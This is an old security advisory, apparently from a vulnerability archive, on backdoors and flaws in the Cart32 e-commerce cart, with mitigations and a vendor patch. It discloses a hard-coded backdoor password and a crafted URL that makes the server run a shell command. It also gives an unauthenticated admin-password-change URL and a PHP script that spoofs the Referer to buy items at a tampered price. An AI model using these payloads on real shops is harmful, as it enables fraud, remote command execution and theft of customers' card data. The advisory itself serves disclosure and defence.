COMMAND
Cart32
SYSTEMS AFFECTED
Any Win32 based web server using Cart32
PROBLEM
Following is based on Cerberus Information Security Advisory by
David and Mark Litchfield. The Cerberus Security Team has
discovered a serious security hole in McMurtrey/Whitaker &
Associates, Inc's Win32 e-Commerce shopping cart, namely, Cart32
that can only be described as a blatant backdoor. Within
cart32.exe, the main file that provides the cart's functionality,
there is a secret hidden password that can be used to gain vital
information such as other passwords and using these an attacker
can modify the shopping cart's properties so that arbitary
commands may be run on the server as well as gain access to
customers' credit card details, shipping addresses and other
highly sensitive information.
Within cart32.exe there is a secret backdoor password of "wemilo"
(found at file offset 0x6204h) known internally as the
Cart32Password. With knowledge of this password an attacker can
go to one of several undocument URLs such as
http://charon/scripts/cart32.exe/cart32clientlist
and obtain a list the passwords for each Cart32 client. (A client
is essentially a shop site). Although these passwords appear to
be hashed they can still be used. For example they can be
embedded in a specially crafted URL that will allow the attacker
to prime the server to run an arbitrary command when an order is
confirmed:
http://charon/scripts/c32web.exe?TabName=Cart32%2B&Action=Save+Cart32%2B+Tab&SaveTab=Cart32%2B&Client=foobar&ClientPassword=e%21U%23_%25%28%5D%5D%26%25*%2B-a&Admin=&AdminPassword=&TabToSave=Cart32%2B&PlusTabToSave=Run+External+Program&UseCMDLine=Yes&CMDLine=cmd.exe+%2Fc+dir+%3E+c%3A%5Cfile.txt
This URL will set the cart's properties to spawn a shell, perform
a directory listing and pipe the output to a file called file.txt
on the root of the C: drive when an order is confirmed. After
doing this the attacker would then create a spurious order and
confirm it thus executing the command. (Please note that the
above URL is pertinent only to an internal Cerberus server -
password details and client info would need to be changed to
reflect the site in question).
Further to this the Cerberus Security Team has found what is,
perhaps, a second backdoor. By going directly to the following
URL
http://charon/scripts/c32web.exe/ChangeAdminPassword
it is possible to change the administrative password with out
knowledge of the previous one.
Because the 'wemilo' string is unicode try looking for
"w\0e\0m\0i\0l\0o\0". Also, there's a version of 'strings' for
NT that does both ASCII strings and Unicode strings over at
www.sysinternals.com in the 'miscellaneous' section of their NT
stuff.
Another interesting Cart32 command was mentioned by Cassius. Ex:
http://example.com/cgi-bin/cart32.exe/expdate
This causes an error and displays a debugging page with server
variables, the contents of the Cart32 administration directory
and sometimes, the contents of cgi-bin. This makes it easy to
spot misconfigured Cart32 installs (customer databases installed
to the cgi-bin directory.) You could fix this one in a hexeditor
by changing the /EXPDATE string to something random.
Bunny69 added more. While messing around with Cart32, he
discovered the following bug (existance of such bugs in eCarts is
well known, but it was never discovered in Cart32). When a user
clicks on a product he's interested in, he sees a form where he
can add this product to his cart, the problem is that the price
of the product is passed to the Cart32 system by a "hidden" HTML
tag named Price. A simple edit of this field will permit a
malicious attacker to buy products in the desired price (probably
$0). This was tested on versions 2.5a and 3.0.
Exploiting this hole is extremly easy, one should simply save the
web page of the desired product in his hard drive, edit the HTML
source, change the price to 0, browse the page again and submit
the form - voila, a nice new Porche 911 for the nice price of
$1.99.
cart32.phtml (a PHP exploit for Cart32 Stupidity):
<?php
/*
Caution - long lines ahead.
Cart32.phtml
Bypass lame "security" options by providing our own referer
and tainted data via POST.
cdi@thewebmasters.net
PostToHost()
Heavily modified version of Rasmus' PostToHost function
It's generic enough to handle any method containing
just about any data.
$data: urlencoded QUERY_STRING format
$cookie: urlencoded cookie string format (name=value;name=value).
*/
function PostToHost($host="",$port="80",$method="POST",$path="",$data="",$refer="",$client="",$cookie="")
{
$fp = fsockopen($host,$port);
if(!$fp) { echo "Failed to open port"; exit; }
fputs($fp, "$method $path HTTP/1.0\n");
if($cookie != "") { fputs($fp, "Cookie: $cookie\n"); }
if($refer != "") { fputs($fp, "Referer: $refer\n"); }
if($client != "") { fputs($fp, "User-Agent: $client\n"); }
if($method == "POST")
{
fputs($fp, "Content-type: application/x-www-form-urlencoded\n");
fputs($fp, "Content-length: " . strlen($data) . "\n");
}
fputs($fp, "Connection: close\n\n");
if($method == "POST")
{
fputs($fp, "$data\n");
}
$results = "";
while(!feof($fp))
{
$results .= fgets($fp, 1024);
}
fclose($fp);
return $results;
}
// Whee, now all we need to do is set up the data
$host = 'www.cart32.com';
$port = 80;
$method = "POST";
$path = '/cgi-bin/cart32.exe/justsocks-AddItem';
$refer = 'www.IGuessYouDontTakeYourOwnAdvice..com';
// And even if they did, we could set the Referer to match
// anything we wanted.
$client = 'CDI Spoof (v1.0)';
$cookie = "";
// Real price of this product was $6.99
$data = 'Price=1000.56&Item=Wigwam+Triathlete+Ultra-Lite&PartNo=F6092&Qty=5&p1=XL&t1=d-Size%3BS%3BM%3BL%3BXL&p2=Black&t2=d-Color%3BBlack%3BWhite';
// And now call the function
$raw = PostToHost($host,$port,$method,$path,$data,$refer,$client,$cookie);
print "<PRE>\n\n";
print " Host: $host\n Port: [$port]\n Method: [$method]\n Path: [$path]\n";
print " Referer: [$refer]\n Client: [$client]\n Cookie: [$cookie]\n";
print " Data: [$data]\n";
print "</PRE>\n";
print "<P>Results of operation:<BR><HR NOSHADE><P>\n";
print "$raw\n";
?>
The JustSocks site is real and is hosted by Cart32.com - the data
sent above resulted in the following: (html removed)
Host: www.cart32.com
Port: [80]
Method: [POST]
Path: [/cgi-bin/cart32.exe/justsocks-AddItem]
Referer: [www.IGuessYouDontTakeYourOwnAdvice.com]
Client: [CDI Spoof (v1.0)]
Cookie: []
Data: [Price=1000.56&Item=Wigwam+Triathlete+Ultra-Lite&PartNo=F6092&Qty=5&p1=XL&t1=d-Size%3BS%3BM%3BL%3BXL&p2=Black&t2=d-Color%3BBlack%3BWhite]
Results of operation:
HTTP/1.1 200 OK
Server: Microsoft-IIS/4.0
Date: Tue, 23 May 2000 20:54:04 GMT
Content-type: text/html
Set-Cookie: Cart32-JUSTSOCKS=.3478662; path=/; expires=Thursday, 25-May-2000 01:01:01 GMT
SOLUTION
Cerberus recommends that the following steps be actioned
immediately. Cerberus has tested this in their labs and the Cart
functionality will not be broken by following these steps.
1) Download a Hex Editor such as UltraEdit and edit cart32.exe
changing the "wemilo" password to something else. This
will address the first issue.
2) Because c32web.exe is the administration program for Cart32
only site administrators will need access to it. Set the
NTFS permissions on this file so that only Administrators
have access to it. This way anyone attempting to access
this file to change the admin password will be prompted for
an NT account and password. For other "servers" such as
Windows 95 and 98 Cerberus recommends removing this file.
Dildog and Weld Pond from L0pht made following fix. The Cartfix
program is a quick temporary solution for users waiting for a
permanent fix from the cart32 vendor, McMurtrey/Whitaker &
Associates. The Cartfix program searches for the secret backdoor
password in the cart32.exe program and replaces it with a random
backdoor password. It changes the ACL on the c32web.exe
administration program so that anonymous users cannot change the
administrator password for cart32. This ACL fix will only work on
Windows NT/2000 systems.
This patch does in no way make the cart32 software secure. It
merely eliminates the two problems detailed in the Cerberus
Information Security advisory. The security problems in this
software are at a basic design level and may take several days
for the vendor to fix. This patch will allow users of cart32 to
be safe from these high risk vulnerabilies while awaiting this
fix. Executable file:
http://www.l0pht.com/advisories/cartfix.exe
Source code:
http://www.l0pht.com/advisories/cartfixsrc.zip
You must be logged on as administrator to run the program. Press
the browse button and select the directory that contains the
cart32 software. This is usually cgi-bin or scripts. After the
directory is selected press 'patch' to patch your cart32
installation.
As for what Bunny69 discovered, that "hole" is avoided by setting
"Domain(s) to Accept Orders" in the 'Advanced' Tab. If the
referral URL does not match one of those domains provided, the
order will not go through. To quote from Cart32 v3.0 Help:
Domain(s) To Accept Orders
This is a list of domain names or ip addresses in which to
accept orders. This would be your website. This prevents a
user from downloading a page containing product information
and then changing the price or other parameter and then
submitting the order. You can one domain name or several
separated by commas. Ex. www.cart32.com or www.cart32.com,
cart32.com, 207.150.83.60 (END QUOTE)
Of course, there are ways to go around the referral check. Which
is why the "Require POST" option exists, which means the form must
be submitted using 'POST' and not 'GET'. Again, there are ways
to avoid that check (for example, creating your own simplistic
"web browser"). However, all Cart32 users should skim through the
orders to see any noticeable price errors.